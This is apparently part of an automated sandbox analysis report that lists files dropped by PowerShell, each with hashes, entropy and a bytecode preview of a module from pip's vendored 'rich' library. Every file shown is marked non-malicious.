                                                                                                                                                                                                            Preview:o..........g.........................@...sH...U.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.j.d.k.r%d.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.rAd.d.l.m.Z.m.Z.m.Z...g.d...Z.e.e.d.<.d.d...e.D...Z.e.e.d.<.d.d.d.d.d.d...Z.e.e.d.<.i.e.j.d.d.....e.j.d.d.....e.j.d.d.....e.j.d.d.....e.j.d.d.....e.j.d.d.....e.j.d.d.....e.j.d.d.....e.j d.d.....e.j!d.d.....e.j"d.d.....e.j#d.d.....e.j$d d.....e.j%d!d.....e.j&d"d.....e.j'd#d.....Z(e.e)e.d$e*f...f...e.d%<.G.d&d'..d'..Z+e.f.d(e*d)e.e)d.f...d*e*f.d+d,..Z,e.f.d(e*d)e.e)e*f...d*e*f.d-d...Z-e.d/k...r d.d0l/m.Z...e...Z.e..0d1....e1d2..D.].Z2e..3d3d4e2........e..4d5......q.d.S.d.S.)6.....N)...TYPE_CHECKING..Callable..Dict..Iterable..List..Union)...........)...Final.....)...ControlCode..ControlType..Segment)...Console..ConsoleOptions..RenderResult)......r.....................STRIP_CONTROL_CODESc....................C...s....i.|.].}.|.d...q.S...N..)....0Z._codepointr....r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\s
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6215
                                                                                                                                                                                                            Entropy (8bit):5.870089286269593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9ecBjarOSuV5JTlYjEAwuemTd9xmz/Hw6uNaX0+Trc1ln/n/hMeR9oiz+xlrpbhS:EcMmwE29xmzvw6uNuHV+zz+xlhk
                                                                                                                                                                                                            MD5:9D83B654D2E99DAC2F7EBAEA0BDFE395
                                                                                                                                                                                                            SHA1:CE40B4DFFC5FB54AFBEA1042B55CA6289AF32027
                                                                                                                                                                                                            SHA-256:802DB7C4ECF660933BBD52F66401DA8D73525963B0DF1FE31B09E504C33FAB7E
                                                                                                                                                                                                            SHA-512:39A2EA50FB373D7F12DCB9892DEA2DEC6B9139ED731C6700DE3D8906EB26287010CCD23998E55C79A17AEAD38413EC1AEDAD53ABBB4ADBA47B33732C766ABD47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sT...U.d.d.l.m.Z...d.d.l.m.Z...i.d.e.......d.e.d.d.d.d.d.d.d.d.d.d.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d ....d!e.d!d ....d"e.d"d ....i.d#e.d#d ....d$e.d$d ....d%e.d%d ....d&e.d&d ....d'e.d#d.d(....d)e.d#d.d.d*....d+e.d.d!d,....d-e.d.d.d/....d0e.d.d.d/....d1e.d.d.d/....d2e.d.d!d,....d3e.....d4e.d%d ....d5e.d.d.....d6e.d"d ....d7e.d.d!d,....d8e.d.d!d9......i.d:e.d.d;d9....d<e.d.d#d,....d=e.d.d.....d>e.d"d ....d?e.d;d ....d@e.d!d ....dAe.d!d.dB....dCe.d!d.d.dD....dEe.......dFe.d%d.dG....dHe.......dIe.d.d.....dJe.d#d ....dKe.d"d.dG....dLe.d!d.dB....dMe.d"d.d.dN....dOe.d.d.......i.dPe.d.d.....dQe.d.dRd,....dSe.d.dRd,....dTe.d.dRd,....dUe.d.dRd,....dVe.d.d.....dWe.dXd.dB....dYe.d.d ....dZe.d.d.....d[e.d#d.d(....d\e.d.d.....d]e.d$d.d(....d^e.d%d.d.d_....d`e.d%d.d.d_....dae.dRd.d(....dbe.dcd.d(....dde.d$d.d(......i.dee.d.dfd.d.dg..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1238
                                                                                                                                                                                                            Entropy (8bit):5.584665087190578
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9yTnO4g/QekWp1Rhkqvn86c6C2LafK3/Ms7D4XRTL2qLxC/9Q:9cnBJqkqPRtC2WfK3/TwXRTSqX
                                                                                                                                                                                                            MD5:D19E7E14CA5603CD59CA664776DD73FA
                                                                                                                                                                                                            SHA1:CC8EF179A45E49D1A5F38887B81EC2E11AE4425E
                                                                                                                                                                                                            SHA-256:7206B449E0A59168C70EEDE6694019DB136FA4455783AD78396C39AB8D2860A3
                                                                                                                                                                                                            SHA-512:9611BFA39224D8BA2F29CC8B8E6FFA5FC0BF2C2C604E5EDCA8F2FBE1EF679972A92A5F3709A2B612293E1042F7B861D0C233863A78C697A494BF81EB9A231F9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sd...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.e.d.k.r0e.....d.S.d.S.)......N)...inspect)...Console..get_windows_console_features)...Panel)...Pretty..returnc....................C...s`...t...}.t.|.....t...}.t.|.....d.}.d.d...|.D...}.|...t.j.t.|...d.d.......|...d.t.......d.......d.S.).z9Print a report to the terminal with debugging information)...TERM..COLORTERMZ.CLICOLOR..NO_COLORZ.TERM_PROGRAM..COLUMNS..LINES..JUPYTER_COLUMNS..JUPYTER_LINESZ.JPY_PARENT_PIDZ.VSCODE_VERBOSE_LOGGINGc....................S...s....i.|.].}.|.t...|.....q.S...)...os..getenv)....0..namer....r.....pC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/diagnose.py..<dictcomp>....s......z.report.<locals>.<dictcomp>z.[b]Environment Variables)...titlez.platform=".."N).r....r....r......printr......fitr......platform..system)...console..featuresZ.env_names..envr....r....r......report....s.........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3284
                                                                                                                                                                                                            Entropy (8bit):5.3857221278385214
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9M7vinHrdXB1aK8Vg5zkIjR0AwPi0SC4kPHF9frSkJ:m65XBUKJz+HF9frSkJ
                                                                                                                                                                                                            MD5:3D5F1AC766B068F2DFF5FA91E6B63E10
                                                                                                                                                                                                            SHA1:32224D9870B6885B4D53601916EC951E6AF4F51D
                                                                                                                                                                                                            SHA-256:7136B791EF7D226A97EA33A59725637E8C72200F7984230AEE91DD0F5545BAB3
                                                                                                                                                                                                            SHA-512:AD149529EA63AAE342FF0450CD2702C6EDB433C1A071CDA5A1A1CC5DA6024C8CB4E51E4B5616AFF56279B639EC71358EDF24009212DAE3229DC0EC117B593CBA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s@...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.d.k.r8d.d.l.m.Z...n.d.d.l.m.Z...e.rJd.d.l.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.d.k.r.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.d.d...Z.e.d.d...e.e.......D...d.d...Z.e.. e.....e!e.j"..d.k.r.e..#e.j"d.......d.S.d.S.d.S.)......N)...TYPE_CHECKING..Optional..Union.....)...JupyterMixin)...Segment)...Style)...EMOJI...._emoji_replace)...........)...Literal)...Console..ConsoleOptions..RenderResult)...emoji..textc....................@...s....e.Z.d.Z.d.Z.d.S.)...NoEmojiz.No emoji by that name.N)...__name__..__module__..__qualname__..__doc__..r....r.....mC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/emoji.pyr........s........r....c....................@...s....e.Z.d.Z.g.d...Z.d.d.d...Z.....d.d.e.d.e.e.e.f...d.e.e...d.d.f.d.d...Z.e.d.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.............d.d.d...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1544
                                                                                                                                                                                                            Entropy (8bit):4.441280528416461
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9KLULVzZBeSUNvRH2LJfSazqLryLFuhIdv1xwEIVmo+9Q3Clo2Hql89X:97L9SSUNZH29S4OrYFui1bBH9QUql89X
                                                                                                                                                                                                            MD5:7C3BDCBE31CE737A657C6F62651C1BEC
                                                                                                                                                                                                            SHA1:C44F63BD0F369D3C77C8D9B9AFBE7D7A4D8AE512
                                                                                                                                                                                                            SHA-256:2E2FAA3E7EB5E565E64E1F3C592175E2CE63E68BA274EDECEF70C12582027045
                                                                                                                                                                                                            SHA-512:C654D04CC68634D7B0D04608C38AF998DDB5558FB8668C7FE8C3CC8E49177C3F8D32E06FFB142C2565C67370BAD9ED25F64722C151DE9171B64C3542A95D6ECB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).c....................@........e.Z.d.Z.d.Z.d.S.)...ConsoleErrorz.An error in console operation.N....__name__..__module__..__qualname__..__doc__..r....r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/errors.pyr.................r....c....................@...r....)...StyleErrorz.An error in styles.Nr....r....r....r....r....r........r....r....c....................@...r....)...StyleSyntaxErrorz.Style was badly formatted.Nr....r....r....r....r....r........r....r....c....................@...r....)...MissingStylez.No such style.Nr....r....r....r....r....r........r....r....c....................@...r....)...StyleStackErrorz.Style stack is invalid.Nr....r....r....r....r....r........r....r....c....................@...r....)...NotRenderableErrorz.Ob
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2277
                                                                                                                                                                                                            Entropy (8bit):5.250802983710399
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9BTyEIoQXoe/z2Kk7ebkrlitrEYR6aexA/GZl//jOvXX5W+YE:9BeVoQXJ/Tk7e8ilB6rA/Gb/qvXptL
                                                                                                                                                                                                            MD5:754D6EA73970D6579F6EC8D967DF47FB
                                                                                                                                                                                                            SHA1:99FEEEDA03063C4A900D8BE9AFA9FEE798731D58
                                                                                                                                                                                                            SHA-256:7515C9282CC7C92B77671B5EB39F64AF47090B9678513318EEE0DE672796F958
                                                                                                                                                                                                            SHA-512:1BC3B03916FEB7E77E709CFF19F7C564C0B69BA97E1091E4B01D826ACB83BF4C2BAFF2A7A91387348BB1B578C7532A5DB8051256CC4A5CBEEA7AB4776A78B8F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gP........................@...s^...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r$d.d.l.m.Z...G.d.d...d.e.j...Z.d.S.)......N)...IO..TYPE_CHECKING..Any..List.....)...AnsiDecoder)...Text)...Consolec....................@...sn...e.Z.d.Z.d.Z.d.d.d.e.e...d.d.f.d.d...Z.e.d.e.e...f.d.d.....Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.d.d...Z.d.S.)...FileProxyzAWraps a file (e.g. sys.stdout) and redirects writes to a console...consoler......file..returnNc....................C...s....|.|._.|.|._.g.|._.t...|._.d.S...N)..._FileProxy__console.._FileProxy__file.._FileProxy__bufferr......_FileProxy__ansi_decoder)...selfr....r......r.....rC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/file_proxy.py..__init__....s............z.FileProxy.__init__c....................C...s....|.j.S.).z.Get proxied file.).r......r....r....r....r......rich_proxied_file....s......z.FileProxy.rich_proxied_file..namec....................C...s....t.|.j.|.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2634
                                                                                                                                                                                                            Entropy (8bit):5.485811078098122
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:97sB+0ui7oaPJvyX1m2/x6Xn1mdxybusu8h/gjIUkaN/ouxfktT7+2R:97sBH7FBcHcY7+up0oqaN/oAfkt+i
                                                                                                                                                                                                            MD5:11FD53615E433B8F3EA74B8D97D74BBB
                                                                                                                                                                                                            SHA1:2100500DAD74B8A88C0D8EBD9C3BDEDB84B44EF4
                                                                                                                                                                                                            SHA-256:A722A5A0FB0ABC0365E08F192695BE95509E9D04B67FD38B937AE57B7A3C436B
                                                                                                                                                                                                            SHA-512:5B05F61F7A02E399C89F904888B38AA20312321CCDAE58B4969FD8DD739FB0B0DDE5D522D3A2EBD2D381DECF3A9CA534BAB188EBE1925CB1F4F05694F9321FA8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.d...d.e.d.e.e...d.e.d.e.e...d.e.e...d.e.f.d.d...Z.d.e.d.e.e...d.e.d.e.e.e.f...f.d.d...Z.d.d.d...d.e.d.e.e...d.e.e...d.e.f.d.d...Z.d.S.).a....Functions for reporting filesizes. Borrowed from https://github.com/PyFilesystem/pyfilesystem2..The functions declared in this module should cover the different.use cases needed to generate a string representation of a file size.using several different units. Since there are many standards regarding.file size units, three different functions have been implemented...See Also:. * `Wikipedia: Binary prefix <https://en.wikipedia.org/wiki/Binary_prefix>`_....decimal.....)...Iterable..List..Optional..Tuple....... ....precision..separator..size..suffixes..baser....r......returnc....................C...s`...|.d.k.r.d.S.|.|.k.r.d...|...S.t.|.d...D.].\.}.}.|.|...}.|.|.k.r"..n.q.d.j.|.|...|...|.|.|.d...S.).Nr....z.1 bytez.{:,} bytes.....z.{:,.{precision}f}{separator}{}r...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8077
                                                                                                                                                                                                            Entropy (8bit):5.9804590922492835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9/HkY3ADAY9wOm7EiWM0nokENrCjnHr1A9SNyyFULxXye5Q8HXia0NHN75xavi48:ZHVmwOm7Ek9SsBL/5Tyj20ie
                                                                                                                                                                                                            MD5:D39E93E974D9116DEDB892ED16FA9AAD
                                                                                                                                                                                                            SHA1:A1016EB21A7C720FE9CE4E78E8BFC2FAEFC78F9E
                                                                                                                                                                                                            SHA-256:D3776168FE9DCDFD10B0BF681BE88D4CF2FFE8A372011A8318E1875E1E7925C1
                                                                                                                                                                                                            SHA-512:4635C36506CE5DCC69DD4582907DAE1E79FB8F4720A61F0FBE37636A918524F8FAA2C64028B953A18810685E0C41BC5C046F11FE99560865F7CEE6CC5A7EB304
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gq%.......................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.e.d.e.f.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.d.k.r.d.d.l.m.Z...e...Z.e...d.....e...d.....e...d.....e...d.....e...d.....e...d.....e...d.....e...d.....e...d ....e...d!....e...d"....e...d#....e...d$....e...d%....e...d&....e...d'....e...d(....e...d)....e...d*....d.d.l.Z.e.j.e.j.d+d.d,..d-..d.d.....d.S.d.S.)/.....N)...ABC..abstractmethod)...List..Union.....)...Span..Text..regexes..returnc....................G...s....d...|...S.).z{Combine a number of regexes in to a single regex... Returns:. str: New regex with all regexes ORed together.. ..|)...join).r......r.....sC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/highlighter.py.._combine_regex....s......r....c....................@...s@...e.Z.d.Z.d.Z.d.e.e.e.f...d.e.f.d.d...Z.e.d.e.d.d.f.d.d.....Z.d.S.)...Hig
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4764
                                                                                                                                                                                                            Entropy (8bit):5.50156094530909
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9HwLMUalqETvfwb77dYVh1LzndkGIp7rwIYhQeYX1nTiiqNbWwT:pwLlaZLeSVh11EIIIQeYXwiobWwT
                                                                                                                                                                                                            MD5:83B23F5B7D93C257A1510405277006AC
                                                                                                                                                                                                            SHA1:A7F759BE9F5C394F0FB89B69BB228DB05DC5073E
                                                                                                                                                                                                            SHA-256:0F44B83E0B38E808663EE4D2EA479319BBD04E98554B119E840B4B30C6F271C6
                                                                                                                                                                                                            SHA-512:3A286DCABF504C8EA65A56AE5BE2E836A8E985148964BEF9CF9C042341E84F8D73940242930B2C36A3222B367424DF52899E34AF072B7AA8FA4E27C48D1D8235
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sv...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d...Z.e.d.k.r.d.d.l.Z.d.d.l.Z.e.j.d.d...Z.e.j.d.d.d.d.....e.j.d.d.d.e.d.d.d.....e.....Z.d.d.l.m.Z...e...Z.e.d.d...Z.z'e.j.d.k.rle.j.....Z.n.e.e.j.d.....Z e ....Z.W.d.........n.1.s.w.......Y...W.n#..e!y...Z"..z.e..#d.e.j...d.e"........e..$d.....W.Y.d.Z"["n.d.Z"["w.w.e.j#e.e.e.j%d...d.d.....d.S.d.S.) .....)...loads..dumps)...Any..Callable..Optional..Union.....)...Text)...JSONHighlighter..NullHighlighterc....................@...s....e.Z.d.Z.d.Z.................d.d.e.d.e.d.e.e.f...d.e.d.e.d.e.d.e.d.e.d.e.e.e.g.e.f.....d.e.d.d.f.d.d...Z.e.................d.d.e.d.e.d.e.e.f...d.e.d.e.d.e.d.e.d.e.d.e.e.e.g.e.f.....d.e.d.d.f.d.d.....Z.d.e.f.d.d...Z.d.S.)...JSONa_...A renderable which pretty prints JSON... Args:. json (str): JSON encoded data.. indent (Union[None, int, str], optional): Number of characters to indent by. Defaults to 2.. highlight (bool,
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4016
                                                                                                                                                                                                            Entropy (8bit):5.3227623981340635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9RLYruPWdAcMi36z2WbkxoW73QiGHEWFP37J+9XwjTxi1+nFb/JYq3B00Lkg3HZ5:95CGRmE2AiTSE6iA1YqxlbxEsgOVf
                                                                                                                                                                                                            MD5:A112D08E89499274A327C5745479301C
                                                                                                                                                                                                            SHA1:11B78098FDEF08608F056DFA89D4495587CAAC7F
                                                                                                                                                                                                            SHA-256:3B69761FC93D0B23A4F12660510C6E52843DB5AF9723BDB2115269D504A24C86
                                                                                                                                                                                                            SHA-512:DEDF478444A7F7D9A6818902F07C07E368BE2601F039B689190B86D0E424274BDD9A25E5DD838EA2EF9A2E6B65AD87501F8A630497038DC618B83E986DA757B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r2d.d.l.m.Z...d.Z.G.d.d...d...Z.G.d.d...d...Z.d.e.e...d.e.f.d.d...Z.d.e.e...d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.S.)......)...TYPE_CHECKING..Any..Dict..Iterable..List..Sequence)...ConsoleRenderable.....)...get_console)...Segment)...DEFAULT_TERMINAL_THEMEz.<pre style="white-space:pre;overflow-x:auto;line-height:normal;font-family:Menlo,'DejaVu Sans Mono',consolas,'Courier New',monospace">{code}</pre>.c....................@...sP...e.Z.d.Z.d.Z.d.e.d.e.d.d.f.d.d...Z.d.e.e...d.e.e...d.e.d.e.e.e.f...f.d.d...Z.d.S.)...JupyterRenderablez)A shim to write html to Jupyter notebook...html..text..returnNc....................C...s....|.|._.|.|._.d.S.).N).r....r....)...selfr....r......r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/jupyter.py..__init__....s........z.JupyterRenderable.__init__..include..excl
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14664
                                                                                                                                                                                                            Entropy (8bit):5.320375105103997
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:XEfq9ooADWTwfl22wR1ctSNnnQ//MroxJexOuryv6T1PebLw49Yk5FR:X5Ey2wwtSNnBUxfNv65PYwA1FR
                                                                                                                                                                                                            MD5:5425EF4573561FF3898CA3ABF7C473DD
                                                                                                                                                                                                            SHA1:25A837C573DDA6986EA83537FDCDA70474575B34
                                                                                                                                                                                                            SHA-256:B4A6C23CF585311BDDCA306A7E1CF3F137914890AC512F4B975E14C57B2CA431
                                                                                                                                                                                                            SHA-512:25F85759BC7533EE4C24655CE748CA2D5A6807943FE1908C0F50C7B3C1142B262FCB3B2602D367410CF050A7E2BB68776FFEBB9D7BCF82EFD6DC33F44F2F8009
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.6.......................@...sx...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..e.r|d.d.l+m,Z,..G.d.d...d.e...Z-e.d.e#f...Z.e.d.e-f...Z/G.d.d...d.e0..Z1G.d.d...d.e1..Z2G.d.d...d...Z3G.d.d...d.e...Z4G.d.d...d.e4..Z5G.d.d ..d e4..Z6e&G.d!d...d.....Z7e8d"k...r:d.d#l9m.Z...e...Z.e7..Z:e:.;e7d$d%d&..e7d.d'd(..e7d)d*d+......e:d'...<e7d,d-..e7d.d/d0......e:d....<e7d1d/d0..e7d2d-......e:d2...;e7d3d-..e7d4d-..e7d5d-......e:d,...;e7e:j=d6d-..e7d7d-......e:d1...>d8....e..?e:....d9S.d9S.):.....)...ABC..abstractmethod)...islice)...itemgetter)...RLock)...TYPE_CHECKING..Dict..Iterable..List..NamedTuple..Optional..Sequence..Tuple..Union.....)...ratio_resolve)...Align)...Console..ConsoleOptions..RenderableType..RenderResult)...ReprHighlighter)...Panel)...Pretty)...Region)...Result..rich_repr)...Segment)...St
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11641
                                                                                                                                                                                                            Entropy (8bit):5.544284455613057
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:DWW3O6qMVKkX0evaHp7KA65zQa3yyv4m0lS/v5j4TGrU2qT:ib6qMgkX0eva5KPVZyiBUS/vB4SrpqT
                                                                                                                                                                                                            MD5:4F85E7AB80066DC6E67036BD102A7CDE
                                                                                                                                                                                                            SHA1:05DCC187109384DA6A3C858528D2FD55E0E5AA56
                                                                                                                                                                                                            SHA-256:21B70F97887BBB2FDA980E7CC20C5F0E767505CE55C31E73A6B450248ECB08B4
                                                                                                                                                                                                            SHA-512:1165005C716C17669C60B5E76642E8AC9DF067B2A4A4076AE877D9924BB521E0BE05A78102C69A908B911FA9C60E00CE31975F4A1B77FB7210332D5C7AB52AF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g\7.......................@...sJ...U.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!..d.d.l"m#Z#..G.d.d...d.e...Z$G.d.d...d.e.e...Z%e&d.k...r.d.d.l'Z'd.d.l(Z(d.d.l)m*Z*..d.d.l.m+Z+m.Z.m,Z,..d.d.l-m.Z...d.d.l.m.Z...d.d.l/m%Z%..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5..d.d.l6m7Z7..e...Z.e5d.d.d.d...Z4e7d d!d"..Z6e6.8d#d$d%....d&e1d'..d(e6d)d*d+d,..d-e4e3d...g.Z9e*e9..Z:g.d/..Z;e%e.d0....Z<i.Z=e+e,e>e>f...e?f...e@d1<.eAd2..D.].ZBe;eBeCe;......ZDe;D.].ZEeEeDk...r...q.e(.Fd3....e'.Gd.d4..d.k...r,e..HeIe:......d5e'.'..d6..d.....e=eDeEf.<.eCe=..eCe;..d...k...rPe=.JeKe=.L....d.......e7d7d8..Z6e6.Md9....e6.Md:....e6.Md;....e=.N..D.].\.\.ZOZPZQe6.8eOePe#eQd<..eQd=k...r}d>n.d?d@........qhe<.Re..Se6........q...q.W.d.........d.S.1...s.w.......Y...d.S.d.S.)A.....N)...Event..RLock..Thread)...TracebackType)...IO..Any..Callable..List..Optional..TextIO..Type..cast.....)
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3419
                                                                                                                                                                                                            Entropy (8bit):5.4101860824571215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9gqDx44sHmaH/ijbWyYwJ220i3ELJXGpaxKqGJ3Gp89oQ62J/wkTsU10QItVfF0Q:9ggjbSS9UdKaB+qEoQ62mkTNx2Ecym
                                                                                                                                                                                                            MD5:C587DE1A48DE74DF7E347E98857BBB8B
                                                                                                                                                                                                            SHA1:F72210F713083B3AE99C6B53C37886C1AAF5B79B
                                                                                                                                                                                                            SHA-256:F8067B8408DBCF5B1A12A418B94CC5CA24AAE5BD3D0D69435C35E3C07110E5B1
                                                                                                                                                                                                            SHA-512:1B0F6F8201426FCA29764899AD02C4040E174961267DA215994688E240686B2AF96CC68303FC8E9F20C6750D160C6915281279DC2189B9579B5D23EE3E7547B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
